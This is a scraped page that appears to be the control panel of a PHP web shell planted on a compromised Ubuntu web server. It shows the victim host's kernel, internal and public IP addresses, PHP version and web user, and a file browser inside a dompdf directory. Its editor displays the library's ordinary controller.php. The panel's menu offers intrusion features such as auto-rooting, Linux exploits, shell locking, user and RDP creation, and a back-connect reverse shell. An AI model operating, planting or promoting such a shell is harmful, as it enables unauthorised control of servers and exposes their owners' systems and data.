Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.14.66.242
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdu /
libs /
dompdf /
www /
[ HOME SHELL ]
Name
Size
Permission
Action
cssSandpaper
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
controller.php
1.88
KB
-rwxr-xr-x
debugger.php
4.47
KB
-rwxr-xr-x
demo.php
1.95
KB
-rwxr-xr-x
examples.php
3.49
KB
-rwxr-xr-x
fonts.php
4.96
KB
-rwxr-xr-x
foot.inc
350
B
-rwxr-xr-x
functions.inc.php
1.42
KB
-rwxr-xr-x
head.inc
1.93
KB
-rwxr-xr-x
index.php
1017
B
-rwxr-xr-x
jquery-1.4.2.js
70.48
KB
-rwxr-xr-x
setup.php
9.23
KB
-rwxr-xr-x
style.css
3.92
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : controller.php
<?php session_start(); $cmd = isset($_GET["cmd"]) ? $_GET["cmd"] : null; include "../dompdf_config.inc.php"; include "functions.inc.php"; switch ($cmd) { case "clear-font-cache": $files = glob(DOMPDF_FONT_CACHE."*.{UFM,AFM,ufm,afm}.php", GLOB_BRACE); foreach($files as $file) { unlink($file); } break; case "install-font": if (!auth_ok()) break; $family = $_POST["family"]; $data = $_FILES["file"]; foreach($data["error"] as $name => $error) { if ($error) { switch($error) { case UPLOAD_ERR_INI_SIZE: case UPLOAD_ERR_FORM_SIZE: echo "The uploaded file exceeds the upload_max_filesize directive in php.ini."; break; case UPLOAD_ERR_PARTIAL: echo "The uploaded file was only partially uploaded."; break; case UPLOAD_ERR_NO_FILE: break; case UPLOAD_ERR_NO_TMP_DIR: echo "Missing a temporary folder."; break; default: echo "Unknown error"; } continue; } $weight = "normal"; $style = "normal"; switch($name) { case "bold": $weight = "bold"; break; case "italic": $style = "italic"; break; case "bold_italic": $weight = "bold"; $style = "italic"; break; } $style_arr = array( "family" => $family, "weight" => $weight, "style" => $style, ); Font_Metrics::init(); if (!Font_Metrics::register_font($style_arr, $data["tmp_name"][$name])) { echo htmlentities($data["name"][$name])." is not a valid font file"; } else { $font_view = htmlentities("$family $weight $style"); echo "The <strong>$font_view</strong> font was successfully installed !<br />"; } } break; }
Close